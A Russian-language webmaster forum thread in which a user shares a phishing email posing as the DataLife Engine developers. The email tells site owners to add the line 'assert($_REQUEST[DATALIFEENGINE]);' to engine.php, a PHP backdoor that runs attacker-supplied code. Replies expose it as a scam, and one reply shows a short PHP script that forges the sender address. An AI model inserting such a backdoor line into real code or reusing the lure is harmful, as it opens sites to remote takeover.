Критическая уязвимость на DLE

12
R8
На сайте с 21.11.2012
Offline
95
8540

Всем привет, пришло вот такое письмо от dle-news.ru:

Уважаемые владельцы сайта,

благодарим вас за выбор системы управления сайтом «DataLife Engine».

Уведомляем вас о том, что силами наших специалистов была обнаружена критическая уязвимость во всех версиях «DataLife Engine». При помощи данной уязвимости злоумышленники могут легко получить доступ к панели управления уязвимого сайта. Проблема заключается в недостаточной фильтрации данных. Уязвимость является крупнейшей за все 10 лет разработки «DataLife Engine», примерно 90% сайтов на «Data Life Engine» могут быть взломаны при помощи неё.

К сожалению, ваш сайт входит в число уязвимых сайтов и может быть взломан в любой момент. Просим вас серьёзно отнестись к данной проблеме и устранить уязвимость, следуя инструкции ниже:


Для исправления откройте файл вашего сайта: /engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_REQUEST[DATALIFEENGINE]);

Кому еще такое уведомление пришло?

И кто-нибудь подскажет, как эта магическая строка решает проблему?

Ненавижу подписи
T2
На сайте с 23.09.2007
Offline
60
#1

Полагаю, что это просто мошенники. Добавив этот код, вы просто создадите уязвимость на сайте, с помощью которой в дальнейшем может быть осуществлен взлом или другие неправомерные действия.

DeL Esprit
На сайте с 27.01.2010
Offline
223
#2
rexsar_87:
Всем привет, пришло вот такое письмо от dle-news.ru:
Уважаемые владельцы сайта,
благодарим вас за выбор системы управления сайтом «DataLife Engine».

служебные заголовки письма глянь )))

интересно, если напишут положи ключи от машины под то колесо, и подпишутся "БМВ" - тоже поверите?

з.ы. опередили.

Тестирую облачный майнинг - узнаем развод или нет. - окупаемость 3 месяца? мелкие суммы (https://goo.gl/aPWmoj) | майнинг Monero, минимум $830 (https://goo.gl/3XivbP) Биржи (ввод/вывод) - на Приват (https://goo.gl/CGZTnD), на Payeer, Capitalist, Advcash, Qiwi... (https://goo.gl/eejAgs)
SS
На сайте с 07.10.2014
Offline
11
#3

Очевидно же, письмо - фейк, простая спам рассылка

R8
На сайте с 21.11.2012
Offline
95
#4
DeL Esprit:
служебные заголовки письма глянь )))

Ну, я то заподозрил неладное, но все таки, решил спросить на всякий случай))

Письмо отправлено было с адреса tech@dle-news.ru, сейчас глянул, у них на сайте другое мыло контактное...

maximka77
На сайте с 15.10.2011
Offline
238
#5

rexsar_87, совсем недавно аналогичная тема была на серче, сейчас с ходу не найду. Все новые уязвимости техподдержка ДЛЕ всегда выкладывает у себя на сайте http://dle-news.ru/bags/. В крайнем случае можно написать им в техподдержку и спросить (если конечно есть лицензия :)). Не ведитесь на разные фейки...

- Базы чатов и каналов Телеграм ( https://base-top.ru/ ) - Тематические ссылки с главных страниц ( https://tier1buy.ru/ )
D8
На сайте с 07.02.2011
Offline
78
#6
WebAlt
На сайте с 02.12.2007
Offline
261
#7
celsoft:
Любые патчи всегда официально публикуются в соответствующем разделе http://dle-news.ru/bags/

А это письмо не от нас и отправлялось не с нашего домена, это мошенники втюхивают вам вирус.

Вы же все администраторы сайтов, как вы можете "вестись" на подобные письма. Вам как администраторам сайтов должно быть известно, что в качестве отправителей писем можно поставить любой адрес и поэтому нужно всегда смотреть именно свойства важных писем и откуда реально пришло письмо и с какого сервера.

Ладно когда обычные пользователи интернета проявляют невнимательность, но когда подобную безалаберность проявляют администраторы сайтов, это уже переходит грани разумного. Что уж тут удивляться новостям типа http://habrahabr.ru/post/236077/ и http://habrahabr.ru/post/235949/ где люди свято верят что они очень ответственны, а это все разработчики виноваты.

.......................

psics
На сайте с 02.04.2009
Offline
130
#8
rexsar_87:
Ну, я то заподозрил неладное, но все таки, решил спросить на всякий случай))
Письмо отправлено было с адреса tech@dle-news.ru, сейчас глянул, у них на сайте другое мыло контактное...

создай файл не важно название .php

и потом так

<?

$message = "Не важно какой текст";
$subject = "Баг в DLE";
$from = 'tech@dle-news.ru';
$to = "mymail@mail.ru"; //твое мыло
mail($to, $subject, $message, $from);
?>

Посмотри итог). То письмо, которое получил ты)

Запусти на выполнение.

Casan
На сайте с 10.10.2014
Offline
3
#9

Конечно, фейк. Не иначе. Заголовки письма глядите всегда.

PHP-скрипты, создание сайтов, разработка интернет-магазинов, парсеров и т.д. (/ru/forum/869424)
anser06
На сайте с 11.03.2006
Offline
292
#10
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий